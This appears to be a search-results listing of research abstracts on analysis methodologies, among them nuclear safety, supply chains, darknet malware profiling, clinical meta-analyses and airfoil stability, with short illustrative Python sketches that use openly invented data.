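# distance between the oldest and most recent shoreline along a transect, divided
# by the elapsed time. This minimal sketch recomputes EPR for a few transects;
# the positions and dates are invented, and the PostgreSQL/PostGIS integration of
# the study is not reproduced.
from datetime import date

def end_point_rate(d_old_m, d_new_m, t_old, t_new):
    """Erosion (negative) or accretion (positive) rate in m/yr along a transect,
    with distances measured seaward from the DSAS baseline."""
    years = (t_new - t_old).days / 365.25
    return (d_new_m - d_old_m) / years

transects = [  # (id, distance in 1956 (m), distance in 2011 (m)) -- assumed data
    ("T001", 120.0, 95.0),
    ("T002", 80.0, 82.5),
]
for tid, d1956, d2011 in transects:
    rate = end_point_rate(d1956, d2011, date(1956, 7, 1), date(2011, 7, 1))
    print(f"{tid}: {rate:+.2f} m/yr")
```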

  14. Compliance strategy for statistically based neutron overpower protection safety analysis methodology

    International Nuclear Information System (INIS)

    Holliday, E.; Phan, B.; Nainer, O.

    2009-01-01

    The methodology employed in the safety analysis of the slow Loss of Regulation (LOR) event in the OPG and Bruce Power CANDU reactors, referred to as Neutron Overpower Protection (NOP) analysis, is a statistically based methodology. Further enhancement to this methodology includes the use of Extreme Value Statistics (EVS) for the explicit treatment of aleatory and epistemic uncertainties, and probabilistic weighting of the initial core states. A key aspect of this enhanced NOP methodology is to demonstrate adherence, or compliance, with the analysis basis. This paper outlines a compliance strategy capable of accounting for the statistical nature of the enhanced NOP methodology. (author)

  15. A study on safety analysis methodology in spent fuel dry storage facility

    Energy Technology Data Exchange (ETDEWEB)

    Che, M. S.; Ryu, J. H.; Kang, K. M.; Cho, N. C.; Kim, M. S. [Hanyang Univ., Seoul (Korea, Republic of)

    2004-02-15

    Collection and review of the domestic and foreign technology related to spent fuel dry storage facility. Analysis of a reference system. Establishment of a framework for criticality safety analysis. Review of accident analysis methodology. Establishment of accident scenarios. Establishment of scenario analysis methodology.

  16. Modeling methodology for supply chain synthesis and disruption analysis

    Science.gov (United States)

    Wu, Teresa; Blackhurst, Jennifer

    2004-11-01

    The concept of an integrated or synthesized supply chain is a strategy for managing today's globalized and customer driven supply chains in order to better meet customer demands. Synthesizing individual entities into an integrated supply chain can be a challenging task due to a variety of factors including conflicting objectives, mismatched incentives and constraints of the individual entities. Furthermore, understanding the effects of disruptions occurring at any point in the system is difficult when working toward synthesizing supply chain operations. Therefore, the goal of this research is to present a modeling methodology to manage the synthesis of a supply chain by linking hierarchical levels of the system and to model and analyze disruptions in the integrated supply chain. The contribution of this research is threefold: (1) supply chain systems can be modeled hierarchically; (2) the performance of the synthesized supply chain system can be evaluated quantitatively; and (3) reachability analysis is used to evaluate the system performance and verify whether a specific state is reachable, allowing the user to understand the extent of the effects of a disruption.
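
    As a minimal illustration of the reachability idea mentioned above, the sketch below runs a breadth-first search over an invented directed dependency graph to list every downstream entity a disruption can reach; the paper's hierarchical modeling formalism is not reproduced.

```python
# Minimal sketch of reachability analysis on a directed supply-chain dependency
# graph: starting from a disrupted entity, find every downstream entity the
# disruption can propagate to. The paper's hierarchical modeling formalism is
# not reproduced; the example network is invented.
from collections import deque

# edge u -> v means "v depends on material/information from u" (assumed network)
supply_chain = {
    "raw_supplier": ["component_plant"],
    "component_plant": ["assembly_plant"],
    "assembly_plant": ["dist_center_east", "dist_center_west"],
    "dist_center_east": ["retailer_1"],
    "dist_center_west": ["retailer_2"],
    "retailer_1": [], "retailer_2": [],
}

def reachable_from(graph, start):
    """Breadth-first search: all nodes a disruption at `start` can reach."""
    seen, queue = {start}, deque([start])
    while queue:
        node = queue.popleft()
        for nxt in graph[node]:
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen - {start}

print("disruption at component_plant affects:",
      sorted(reachable_from(supply_chain, "component_plant")))
```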

  17. Formation of the methodological matrix of the strategic analysis of the enterprise

    Directory of Open Access Journals (Sweden)

    N.H. Vygovskaya

    2018-04-01

    Full Text Available The article is devoted to the study of the methodological matrix of the strategic analysis of the enterprise. The aim of this article is to analyze the influence of methodological changes in the 20th century on the methodology of strategic analysis, and to critically assess and generalize scientific approaches to its methods. An evaluation of scientific works on analysis made it possible to identify the following problems in the methodology of strategic analysis: the lack of consideration of the features of strategic analysis in the formation of its methods, which often leads to confusion with the methods of financial (economic, thrifty) analysis; the failure to use the fact that strategic analysis contains, besides the methods of analyzing the internal and external environment, methods of forecast analysis aimed at forming the strategy for the development of the enterprise; the identification of the concepts «image», «reception» and «method» of analysis; the multidirectionality and indistinctness of the criteria for classifying methods of strategic analysis; and the blind copying of foreign techniques and methods of strategic analysis without taking into account the specifics of domestic economic conditions. The expediency of using the system approach in forming the methodological design of strategic analysis is proved; this allows methodology as a science of methods (a broad approach to the methods of strategic analysis) to be combined with methodology as a set of applied methods and techniques of analysis (a narrow approach to methodology). The use of the system approach made it possible to distinguish three levels of the methodology of strategic analysis. The first and second levels of the methodology correspond to the level of science, the third level to practice. When developing the third level of special methods of strategic analysis, an approach is applied that differentiates them depending on the stages of strategic analysis (methods of the stage

  18. A METHODOLOGICAL APPROACH TO THE STRATEGIC ANALYSIS OF FOOD SECURITY

    Directory of Open Access Journals (Sweden)

    Anastasiia Mostova

    2017-12-01

    Full Text Available The objective of the present work is to substantiate the use of tools for strategic analysis in order to develop a strategy for the country’s food security under current conditions, and to devise the author’s original technique to perform a strategic analysis of food security using a SWOT-analysis. The methodology of the study. The article substantiates the need for strategic planning of food security. The author considers the stages of strategic planning and explains the importance of the stage of strategic analysis of the country’s food security. It is proposed to apply a SWOT-analysis when running a strategic analysis of food security. The study is based on a system of indicators and characteristics of the country’s economy, agricultural sector, market trends, and material-technical, financial, and human resources, which are essential to obtain an objective assessment of the impact of trends and factors on food security and to further develop the procedure for conducting a strategic analysis of the country’s food security. Results of the study. The procedure for the strategic analysis of food security is developed based on the tool of a SWOT-analysis, which implies three stages: a strategic analysis of weaknesses and strengths, opportunities and threats; construction of the matrix of weaknesses and strengths, opportunities, and threats (the SWOT-analysis matrix); and formation of the food security strategy based on the SWOT-analysis matrix. A list of characteristics was compiled in order to conduct a strategic analysis of food security and to categorize them as strengths or weaknesses, threats, and opportunities. The characteristics are systemized into strategic groups: production, market, resources, and consumption; this is necessary for the objective establishment of strategic directions, responsible performers, allocation of resources, and effective control, for the purpose of further development and implementation of the strategy. A strategic analysis

  19. Performance Analysis with Network-Enhanced Complexities: On Fading Measurements, Event-Triggered Mechanisms, and Cyber Attacks

    Directory of Open Access Journals (Sweden)

    Derui Ding

    2014-01-01

    Full Text Available Nowadays, real-world systems are usually subject to various complexities such as parameter uncertainties, time delays, and nonlinear disturbances. For networked systems, especially large-scale systems such as multiagent systems and systems over sensor networks, these complexities are inevitably enhanced in degree or intensity because of the use of communication networks. Therefore, it would be interesting to (1) examine how this kind of network-enhanced complexity affects the control or filtering performance; and (2) develop suitable approaches for controller/filter design problems. In this paper, we aim to survey some recent advances in performance analysis and synthesis with three sorts of fashionable network-enhanced complexities, namely, fading measurements, event-triggered mechanisms, and attack behaviors of adversaries. First, these three kinds of complexities are introduced in detail according to their engineering backgrounds, dynamical characteristics, and modelling techniques. Then, developments in the performance analysis and synthesis issues for various networked systems are systematically reviewed. Furthermore, some challenges are illustrated through a thorough literature review and some possible future research directions are highlighted.

  20. Practical Correlation Analysis between Scan and Malware Profiles against Zero-Day Attacks Based on Darknet Monitoring

    Science.gov (United States)

    Nakao, Koji; Inoue, Daisuke; Eto, Masashi; Yoshioka, Katsunari

    Considering the rapid increase in highly organized and sophisticated malware, practical countermeasures, especially against zero-day attacks, need to be developed urgently. Several research activities have already been carried out focusing on statistical analysis of network events by means of global network sensors (the so-called macroscopic approach) as well as on direct malware analysis such as code analysis (the so-called microscopic approach). However, in current research it is not at all clear how to correlate the network behaviors obtained from the macroscopic approach with the malware behaviors obtained from the microscopic approach. In this paper, on one side, network behaviors observed on a darknet are strictly analyzed to produce scan profiles, and on the other side, malware behaviors obtained from honeypots are analyzed so as to produce a set of profiles containing malware characteristics. The inter-relationship between these two types of profiles is then discussed and studied so that frequently observed malware behaviors can finally be identified in view of the scan-malware chain.
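
    A minimal sketch of one way to inter-correlate the two kinds of profiles is given below: each profile is represented as a destination-port frequency vector and malware profiles are ranked by cosine similarity to a darknet scan profile. The ports, counts, and similarity measure are assumptions for illustration, not the profiling scheme of the paper.

```python
# Minimal sketch of correlating a darknet scan profile with candidate malware
# profiles: represent each as a destination-port frequency vector and rank
# malware families by cosine similarity. The actual profiling and chaining used
# in the paper is richer; ports and counts here are invented for illustration.
import numpy as np

ports = [135, 139, 445, 1433, 2967, 5900]                    # feature order (assumed)

scan_profile = np.array([120, 30, 400, 5, 0, 10], float)     # darknet observation
malware_profiles = {                                          # honeypot-derived
    "worm_A": np.array([100, 20, 350, 0, 0, 0], float),
    "bot_B":  np.array([5, 0, 10, 200, 150, 0], float),
}

def cosine(u, v):
    return float(u @ v / (np.linalg.norm(u) * np.linalg.norm(v)))

for name, prof in sorted(malware_profiles.items(),
                         key=lambda kv: -cosine(scan_profile, kv[1])):
    print(f"{name}: similarity = {cosine(scan_profile, prof):.3f}")
```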

  1. Neck-focused panic attacks among Cambodian refugees; a logistic and linear regression analysis.

    Science.gov (United States)

    Hinton, Devon E; Chhean, Dara; Pich, Vuth; Um, Khin; Fama, Jeanne M; Pollack, Mark H

    2006-01-01

    Consecutive Cambodian refugees attending a psychiatric clinic were assessed for the presence and severity of current--i.e., at least one episode in the last month--neck-focused panic. Among the whole sample (N=130), in a logistic regression analysis, the Anxiety Sensitivity Index (ASI; odds ratio=3.70) and the Clinician-Administered PTSD Scale (CAPS; odds ratio=2.61) significantly predicted the presence of current neck panic (NP). Among the neck panic patients (N=60), in the linear regression analysis, NP severity was significantly predicted by NP-associated flashbacks (beta=.42), NP-associated catastrophic cognitions (beta=.22), and CAPS score (beta=.28). Further analysis revealed the effect of the CAPS score to be significantly mediated (Sobel test [Baron, R. M., & Kenny, D. A. (1986). The moderator-mediator variable distinction in social psychological research: conceptual, strategic, and statistical considerations. Journal of Personality and Social Psychology, 51, 1173-1182]) by both NP-associated flashbacks and catastrophic cognitions. In the care of traumatized Cambodian refugees, NP severity, as well as NP-associated flashbacks and catastrophic cognitions, should be specifically assessed and treated.
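
    As an illustration of the kind of logistic regression reported (presence of neck-focused panic predicted by ASI and CAPS scores, with odds ratios obtained by exponentiating the coefficients), the sketch below fits such a model to synthetic data with statsmodels; it does not reproduce the clinical sample or its estimates.

```python
# Minimal sketch of the kind of logistic regression reported: presence of neck-
# focused panic predicted by ASI and CAPS scores, with odds ratios obtained by
# exponentiating the coefficients. The data below are synthetic; they do not
# reproduce the clinical sample.
import numpy as np
import statsmodels.api as sm

rng = np.random.default_rng(42)
n = 130
asi = rng.normal(30, 10, n)        # Anxiety Sensitivity Index (synthetic)
caps = rng.normal(60, 20, n)       # Clinician-Administered PTSD Scale (synthetic)
logit_p = -6.0 + 0.08 * asi + 0.04 * caps
neck_panic = rng.binomial(1, 1 / (1 + np.exp(-logit_p)))

X = sm.add_constant(np.column_stack([asi, caps]))
model = sm.Logit(neck_panic, X).fit(disp=False)
odds_ratios = np.exp(model.params[1:])     # skip the intercept
print("odds ratio per unit ASI :", round(odds_ratios[0], 2))
print("odds ratio per unit CAPS:", round(odds_ratios[1], 2))
```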

  2. Using functional analysis in archival appraisal a practical and effective alternative to traditional appraisal methodologies

    CERN Document Server

    Robyns, Marcus C

    2014-01-01

    In an age of scarcity and the challenge of electronic records, can archivists and records managers continue to rely upon traditional methodology essentially unchanged since the early 1950s? Using Functional Analysis in Archival Appraisal: A Practical and Effective Alternative to Traditional Appraisal Methodologies shows how archivists in other countries are already using functional analysis, which offers a better, more effective, and imminently more practical alternative to traditional appraisal methodologies that rely upon an analysis of the records themselves.

  3. Population Analysis: A Methodology for Understanding Populations in COIN Environments

    National Research Council Canada - National Science Library

    Burke, Mark C; Self, Eric C

    2008-01-01

    .... Our methodology provides a heuristic model, called the "3 x 5 P.I.G.S.P.E.E.R. Model," that can be applied in any environment and will help bridge the gap between strategic theory and tactical implementation...

  4. Ion beam analysis in art and archaeology: attacking the power precisions paradigm

    International Nuclear Information System (INIS)

    Abraham, Meg

    2004-01-01

    It is a post-modern axiom that the closer one looks at something, the more blinkered the view becomes; thus the result is often a failure to see the whole picture. With this in mind, the value of a tool for art and archaeology applications is greatly enhanced if the information is scientifically precise and yet easily integrated into the broader study of the objects at hand. Art and archaeological objects offer some unique challenges for researchers. First, they are almost always extraordinarily inhomogeneous across individual pieces and across types. Second, they are often valuable and delicate, so sampling is discouraged. Finally, in most cases, each piece is unique, thus the data are also unique and of greatest value when incorporated into the overall understanding of the object or of the culture of the artisan. Ion beam analysis solves many of these problems. With IBA, it is possible to avoid sampling by using an external beam setup or by manipulating small objects in a vacuum. The technique is largely non-destructive, allowing multiple data points to be taken across an object. The X-ray yields are from deeper in the sample than those of other techniques, and using RBS one can attain bulk concentrations from microns into the sample. And finally, the resulting X-ray spectra are easily interpreted and understood by many conservators and curators, while PIXE maps are a wonderful visual record of the results of the analysis. Some examples of the special role that ion beam analysis plays in the examination of cultural objects will be covered in this talk.

  5. The development of a safety analysis methodology for the optimized power reactor 1000

    International Nuclear Information System (INIS)

    Hwang-Yong, Jun; Yo-Han, Kim

    2005-01-01

    Korea Electric Power Research Institute (KEPRI) has been developing an in-house safety analysis methodology, based on the delicate codes available to KEPRI, to overcome the problems arising from the currently used vendor-oriented methodologies. For the Loss of Coolant Accident (LOCA) analysis, the KREM (KEPRI Realistic Evaluation Methodology) has been developed based on the RELAP-5 code. The methodology was approved for Westinghouse 3-loop plants by the Korean regulatory organization, and the project to extend the methodology to the Optimized Power Reactor 1000 (OPR1000) has been ongoing since 2001. Also, for the non-LOCA analysis, the KNAP (Korea Non-LOCA Analysis Package) has been developed using the UNICORN-TM code system. To demonstrate the feasibility of these code systems and methodologies, some typical cases of the design basis accidents described in the final safety analysis report (FSAR) were analyzed. (author)

  6. Improved Methodology of MSLB M/E Release Analysis for OPR1000

    International Nuclear Information System (INIS)

    Park, Seok Jeong; Kim, Cheol Woo; Seo, Jong Tae

    2006-01-01

    A new mass and energy (M/E) release analysis methodology for equipment environmental qualification (EEQ) under loss-of-coolant accident (LOCA) conditions has recently been developed and adopted for small break LOCA EEQ. The new M/E release analysis methodology is extended to the M/E release analysis for containment design for large break LOCA and the main steam line break (MSLB) accident, and is named the KIMERA (KOPEC Improved Mass and Energy Release Analysis) methodology. The computer code system used in this methodology is RELAP5K/CONTEMPT4 (or RELAP5-ME), which couples RELAP5/MOD3.1/K, with an enhanced M/E model and a LOCA long-term model, with CONTEMPT4/MOD5. The KIMERA methodology is applied to the MSLB M/E release analysis to evaluate its validity for MSLB in containment design. The results are compared with the OPR1000 FSAR.

  7. Motor Impairments in Transient Ischemic Attack Increase the Odds of a Subsequent Stroke: A Meta-Analysis

    Directory of Open Access Journals (Sweden)

    Neha Lodha

    2017-06-01

    Full Text Available Background and purpose: Transient ischemic attack (TIA) increases the risk for a subsequent stroke. Typical symptoms include motor weakness, gait disturbance, and loss of coordination. The association between the presence of motor impairments during a TIA and the chances of a subsequent stroke has not been examined. In the current meta-analysis, we examine whether the odds of a stroke are greater in TIA individuals who experience motor impairments as compared with those who do not experience motor impairments. Methods: We conducted a systematic search of electronic databases as well as manual searches of the reference lists of retrieved articles. The meta-analysis included studies that reported an odds ratio relating motor impairments to a subsequent stroke, or the number of individuals with or without motor impairments who experienced a subsequent stroke. We examined these studies using rigorous meta-analysis techniques including a random effects model, forest and funnel plots, I², publication bias, and fail-safe analysis. Results: Twenty-four studies with 15,129 participants from North America, Australia, Asia, and Europe qualified for inclusion. An odds ratio of 2.11 (95% CI, 1.67–2.65, p = 0.000) suggested that the chances of a subsequent stroke are increased twofold in individuals who experience motor impairments during a TIA compared with those individuals who have no motor impairments. Conclusion: The presence of motor impairments during TIA is a significantly high-risk clinical characteristic for a subsequent stroke. The current evidence for motor impairments following TIA relies exclusively on clinical reports of unilateral motor weakness. A comprehensive examination of motor impairments in TIA will enhance TIA prognosis and the restoration of residual motor impairments.
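
    As an illustration of the random-effects pooling behind a summary odds ratio and confidence interval, the sketch below applies DerSimonian-Laird pooling to invented per-study log odds ratios; the numbers are not those of the 24 included studies.

```python
# Compact sketch of DerSimonian-Laird random-effects pooling of log odds ratios,
# the kind of calculation behind a pooled OR with a 95% CI. The per-study odds
# ratios and standard errors below are invented; they are not the 24 studies of
# the meta-analysis.
import numpy as np

log_or = np.log([1.8, 2.5, 1.4, 3.0, 2.2])        # per-study log odds ratios
se     = np.array([0.30, 0.25, 0.40, 0.35, 0.28]) # their standard errors

w = 1.0 / se**2                                   # fixed-effect weights
y_fixed = np.sum(w * log_or) / np.sum(w)
Q = np.sum(w * (log_or - y_fixed) ** 2)           # heterogeneity statistic
C = np.sum(w) - np.sum(w**2) / np.sum(w)
tau2 = max(0.0, (Q - (len(log_or) - 1)) / C)      # between-study variance

w_star = 1.0 / (se**2 + tau2)                     # random-effects weights
y_re = np.sum(w_star * log_or) / np.sum(w_star)
se_re = np.sqrt(1.0 / np.sum(w_star))

or_pooled = np.exp(y_re)
ci = np.exp([y_re - 1.96 * se_re, y_re + 1.96 * se_re])
print(f"pooled OR = {or_pooled:.2f}  (95% CI {ci[0]:.2f}-{ci[1]:.2f})")
```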

  8. EUROCONTROL-Systemic Occurrence Analysis Methodology (SOAM)-A 'Reason'-based organisational methodology for analysing incidents and accidents

    International Nuclear Information System (INIS)

    Licu, Tony; Cioran, Florin; Hayward, Brent; Lowe, Andrew

    2007-01-01

    The Safety Occurrence Analysis Methodology (SOAM) developed for EUROCONTROL is an accident investigation methodology based on the Reason Model of organisational accidents. The purpose of a SOAM is to broaden the focus of an investigation from human involvement issues, also known as 'active failures of operational personnel' under Reason's original model, to include analysis of the latent conditions deeper within the organisation that set the context for the event. Such an approach is consistent with the tenets of Just Culture in which people are encouraged to provide full and open information about how incidents occurred, and are not penalised for errors. A truly systemic approach is not simply a means of transferring responsibility for a safety occurrence from front-line employees to senior managers. A consistent philosophy must be applied, where the investigation process seeks to correct deficiencies wherever they may be found, without attempting to apportion blame or liability

  9. Methodologies for analysis of patterning in the mouse RPE sheet

    Science.gov (United States)

    Boatright, Jeffrey H.; Dalal, Nupur; Chrenek, Micah A.; Gardner, Christopher; Ziesel, Alison; Jiang, Yi; Grossniklaus, Hans E.

    2015-01-01

    Purpose Our goal was to optimize procedures for assessing shapes, sizes, and other quantitative metrics of retinal pigment epithelium (RPE) cells and contact- and noncontact-mediated cell-to-cell interactions across a large series of flatmount RPE images. Methods The two principal methodological advances of this study were optimization of a mouse RPE flatmount preparation and refinement of open-access software to rapidly analyze large numbers of flatmount images. Mouse eyes were harvested, and extra-orbital fat and muscles were removed. Eyes were fixed for 10 min, and dissected by puncturing the cornea with a sharp needle or a stab knife. Four radial cuts were made with iridectomy scissors from the puncture to near the optic nerve head. The lens, iris, and the neural retina were removed, leaving the RPE sheet exposed. The dissection and outcomes were monitored and evaluated by video recording. The RPE sheet was imaged under fluorescence confocal microscopy after staining for ZO-1 to identify RPE cell boundaries. Photoshop, Java, Perl, and Matlab scripts, as well as CellProfiler, were used to quantify selected parameters. Data were exported into Excel spreadsheets for further analysis. Results A simplified dissection procedure afforded a consistent source of images that could be processed by computer. The dissection and flatmounting techniques were illustrated in a video recording. Almost all of the sheet could be routinely imaged, and substantial fractions of the RPE sheet (usually 20–50% of the sheet) could be analyzed. Several common technical problems were noted and workarounds developed. The software-based analysis merged 25 to 36 images into one and adjusted settings to record an image suitable for large-scale identification of cell-to-cell boundaries, and then obtained quantitative descriptors of the shape of each cell, its neighbors, and interactions beyond direct cell–cell contact in the sheet. To validate the software, human- and computer

  10. GO-FLOW methodology. Basic concept and integrated analysis framework for its applications

    International Nuclear Information System (INIS)

    Matsuoka, Takeshi

    2010-01-01

    GO-FLOW methodology is a success oriented system analysis technique, and is capable of evaluating a large system with complex operational sequences. Recently an integrated analysis framework of the GO-FLOW has been developed for the safety evaluation of elevator systems by the Ministry of Land, Infrastructure, Transport and Tourism, Japanese Government. This paper describes (a) an Overview of the GO-FLOW methodology, (b) Procedure of treating a phased mission problem, (c) Common cause failure analysis, (d) Uncertainty analysis, and (e) Integrated analysis framework. The GO-FLOW methodology is a valuable and useful tool for system reliability analysis and has a wide range of applications. (author)

  11. Seismic hazard analysis. A methodology for the Eastern United States

    Energy Technology Data Exchange (ETDEWEB)

    Bernreuter, D L

    1980-08-01

    This report presents a probabilistic approach for estimating the seismic hazard in the Central and Eastern United States. The probabilistic model (Uniform Hazard Methodology) systematically incorporates the subjective opinion of several experts in the evaluation of seismic hazard. Subjective input, assumptions and associated hazard are kept separate for each expert so as to allow review and preserve diversity of opinion. The report is organized into five sections: Introduction, Methodology Comparison, Subjective Input, Uniform Hazard Methodology (UHM), and Uniform Hazard Spectrum. Section 2, Methodology Comparison, briefly describes the present approach and compares it with other available procedures. The remainder of the report focuses on the UHM. Specifically, Section 3 describes the elicitation of subjective input; Section 4 gives details of various mathematical models (earthquake source geometry, magnitude distribution, attenuation relationship) and how these models are combined to calculate seismic hazard. The last section, Uniform Hazard Spectrum, highlights the main features of typical results. Specific results and sensitivity analyses are not presented in this report. (author)

  12. Towards a Methodological Improvement of Narrative Inquiry: A Qualitative Analysis

    Science.gov (United States)

    Abdallah, Mahmoud Mohammad Sayed

    2009-01-01

    The article suggests that though narrative inquiry as a research methodology entails free conversations and personal stories, yet it should not be totally free and fictional as it has to conform to some recognized standards used for conducting educational research. Hence, a qualitative study conducted by Russ (1999) was explored as an exemplar…

  13. Prototype application of best estimate and uncertainty safety analysis methodology to large LOCA analysis

    International Nuclear Information System (INIS)

    Luxat, J.C.; Huget, R.G.

    2001-01-01

    Development of a methodology to perform best estimate and uncertainty nuclear safety analysis has been underway at Ontario Power Generation for the past two and one half years. A key driver for the methodology development, and one of the major challenges faced, is the need to re-establish demonstrated safety margins that have progressively been undermined through excessive and compounding conservatism in deterministic analyses. The major focus of the prototyping applications was to quantify the safety margins that exist at the probable range of high power operating conditions, rather than the highly improbable operating states associated with Limit of the Envelope (LOE) assumptions. In LOE, all parameters of significance to the consequences of a postulated accident are assumed to simultaneously deviate to their limiting values. Another equally important objective of the prototyping was to demonstrate the feasibility of conducting safety analysis as an incremental analysis activity, as opposed to a major re-analysis activity. The prototype analysis solely employed prior analyses of Bruce B large break LOCA events - no new computer simulations were undertaken. This is a significant and novel feature of the prototyping work. This methodology framework has been applied to a postulated large break LOCA in a Bruce generating unit on a prototype basis. This paper presents results of the application. (author)

  14. Visualizing Risks: Icons for Information Attack Scenarios

    National Research Council Canada - National Science Library

    Hosmer, Hilary

    2000-01-01

    .... Visual attack scenarios help defenders see system ambiguities, imprecision, vulnerabilities and omissions, thus speeding up risk analysis, requirements gathering, safeguard selection, cryptographic...

  15. BiGlobal linear stability analysis on low-Re flow past an airfoil at high angle of attack

    KAUST Repository

    Zhang, Wei

    2016-04-04

    We perform BiGlobal linear stability analysis on flow past a NACA0012 airfoil at 16° angle of attack and Reynolds number ranging from 400 to 1000. The steady-state two-dimensional base flows are computed using a well-tested finite difference code in combination with the selective frequency damping method. The base flow is characterized by two asymmetric recirculation bubbles downstream of the airfoil whose streamwise extent and maximum reverse flow velocity increase with the Reynolds number. The stability analysis of the flow past the airfoil is carried out under a very small spanwise wavenumber β = 10⁻⁴ to approximate the two-dimensional perturbation, and medium and large spanwise wavenumbers (β = 1–8) to account for the three-dimensional perturbation. Numerical results reveal that under small spanwise wavenumber, there are at most two oscillatory unstable modes corresponding to the near wake and far wake instabilities; the growth rate and frequency of the perturbation agree well with the two-dimensional direct numerical simulation results under all Reynolds numbers. For a larger spanwise wavenumber β = 1, there is only one oscillatory unstable mode associated with the wake instability at Re = 400 and 600, while at Re = 800 and 1000 there are two oscillatory unstable modes for the near wake and far wake instabilities, and one stationary unstable mode for the monotonically growing perturbation within the recirculation bubble via the centrifugal instability mechanism. All the unstable modes are weakened or even suppressed as the spanwise wavenumber further increases, among which the stationary mode persists until β = 4.

  16. BiGlobal linear stability analysis on low-Re flow past an airfoil at high angle of attack

    KAUST Repository

    Zhang, Wei; Samtaney, Ravi

    2016-01-01

    We perform BiGlobal linear stability analysis on flow past a NACA0012 airfoil at 16° angle of attack and Reynolds number ranging from 400 to 1000. The steady-state two-dimensional base flows are computed using a well-tested finite difference code in combination with the selective frequency damping method. The base flow is characterized by two asymmetric recirculation bubbles downstream of the airfoil whose streamwise extent and maximum reverse flow velocity increase with the Reynolds number. The stability analysis of the flow past the airfoil is carried out under a very small spanwise wavenumber β = 10⁻⁴ to approximate the two-dimensional perturbation, and medium and large spanwise wavenumbers (β = 1–8) to account for the three-dimensional perturbation. Numerical results reveal that under small spanwise wavenumber, there are at most two oscillatory unstable modes corresponding to the near wake and far wake instabilities; the growth rate and frequency of the perturbation agree well with the two-dimensional direct numerical simulation results under all Reynolds numbers. For a larger spanwise wavenumber β = 1, there is only one oscillatory unstable mode associated with the wake instability at Re = 400 and 600, while at Re = 800 and 1000 there are two oscillatory unstable modes for the near wake and far wake instabilities, and one stationary unstable mode for the monotonically growing perturbation within the recirculation bubble via the centrifugal instability mechanism. All the unstable modes are weakened or even suppressed as the spanwise wavenumber further increases, among which the stationary mode persists until β = 4.
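
    For readers less familiar with how such results are obtained, the growth rate and frequency of a mode are simply the real and imaginary parts of the leading eigenvalue of the discretised linear stability operator. A minimal Python sketch follows; the small matrix is an invented stand-in for the BiGlobal operator, which in the paper comes from linearising the Navier-Stokes equations about the computed base flow.

        import numpy as np

        # Toy stand-in for the discretised stability operator A in dq/dt = A q.
        # One weakly unstable oscillatory pair plus one damped stationary mode.
        A = np.array([
            [0.02,  1.0,  0.0],
            [-1.0,  0.02, 0.0],
            [0.0,   0.0, -0.5],
        ])

        eigvals = np.linalg.eigvals(A)
        leading = eigvals[np.argmax(eigvals.real)]   # mode with the largest growth rate
        sigma, omega = leading.real, abs(leading.imag)

        print(f"growth rate sigma = {sigma:+.3f} (unstable if > 0)")
        print(f"frequency omega   = {omega:.3f} (oscillatory if > 0)")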

  17. Proposed methodology for completion of scenario analysis for the Basalt Waste Isolation Project

    International Nuclear Information System (INIS)

    Roberds, W.J.; Plum, R.J.; Visca, P.J.

    1984-11-01

    This report presents the methodology to complete an assessment of postclosure performance, considering all credible scenarios, including the nominal case, for a proposed repository for high-level nuclear waste at the Hanford Site, Washington State. The methodology consists of defensible techniques for identifying and screening scenarios, and for then assessing the risks associated with each. The results of the scenario analysis are used to comprehensively determine system performance and/or risk for evaluation of compliance with postclosure performance criteria (10 CFR 60 and 40 CFR 191). In addition to describing the proposed methodology, this report reviews available methodologies for scenario analysis, discusses pertinent performance assessment and uncertainty concepts, advises how to implement the methodology (including the organizational requirements and a description of tasks) and recommends how to use the methodology in guiding future site characterization, analysis, and engineered subsystem design work. 36 refs., 24 figs., 1 tab

  18. Protecting Cryptographic Memory against Tampering Attack

    DEFF Research Database (Denmark)

    Mukherjee, Pratyay

    In this dissertation we investigate the question of protecting cryptographic devices from tampering attacks. Traditional theoretical analysis of cryptographic devices is based on black-box models which do not take into account attacks on the implementations, known as physical attacks. In practice such attacks can be executed easily, e.g. by heating the device, as substantiated by numerous works in the past decade. Tampering attacks are a class of such physical attacks where the attacker can change the memory/computation, gains additional (non-black-box) knowledge by interacting with the faulty device and then tries to break the security. Prior works show that generically approaching such a problem is notoriously difficult. So, in this dissertation we attempt to solve an easier question, known as memory-tampering, where the attacker is allowed to tamper only with the memory of the device…

  19. Time-motion analysis of goalball players in attacks: differences of the player positions and the throwing techniques.

    Science.gov (United States)

    Monezi, Lucas Antônio; Magalhães, Thiago Pinguelli; Morato, Márcio Pereira; Mercadante, Luciano Allegretti; Furtado, Otávio Luis Piva da Cunha; Misuta, Milton Shoiti

    2018-03-26

    In this study, we aimed to analyse goalball players' time-motion variables (distance covered, time spent, maximum and average velocities) in official goalball match attacks, taking into account the attack phases (preparation and throwing), player position (centres and wings) and throwing techniques (frontal, spin and between the legs). A total of 365 attacks were assessed using a video-based (2D) method through manual tracking with the Dvideo system. Inferential non-parametric statistics were applied for comparison of the preparation vs. the throwing phase, wings vs. centres and, among the throwing techniques, frontal, spin and between the legs. Significant differences were found between the attack preparation and the throwing phase for all player time-motion variables: distance covered, time spent, maximum player velocity and average player velocity. Wing players performed most of the throws (85%) and covered longer distances than centres (1.65 vs 0.31 m). The between-the-legs and spin throwing techniques presented greater values for most of the time-motion variables (distance covered, time spent and maximum player velocity) than did the frontal technique in both attack phases. These findings provide important information regarding players' movement patterns during goalball matches that can be used to plan more effective training.
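
    The time-motion variables listed above (distance covered, time spent, maximum and average velocity) reduce to simple operations on the tracked 2D coordinates. A minimal Python sketch is given below; the sampling rate and the short example track are invented and are not taken from the Dvideo data used in the study.

        import numpy as np

        def time_motion_metrics(xy, fps=30.0):
            """Distance (m), time (s), max and mean velocity (m/s) from a 2D track.

            xy  : array of shape (n_frames, 2), court coordinates in metres.
            fps : assumed sampling rate of the tracking system.
            """
            dt = 1.0 / fps
            steps = np.linalg.norm(np.diff(xy, axis=0), axis=1)  # frame-to-frame displacement
            speed = steps / dt
            return {"distance_m": steps.sum(),
                    "time_s": (len(xy) - 1) * dt,
                    "v_max_ms": speed.max(),
                    "v_mean_ms": speed.mean()}

        # Hypothetical attack-preparation track of a wing player.
        track = np.array([[0.0, 0.0], [0.2, 0.1], [0.5, 0.3], [0.9, 0.6], [1.4, 0.9]])
        print(time_motion_metrics(track))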

  20. Common cause failure analysis methodology for complex systems

    International Nuclear Information System (INIS)

    Wagner, D.P.; Cate, C.L.; Fussell, J.B.

    1977-01-01

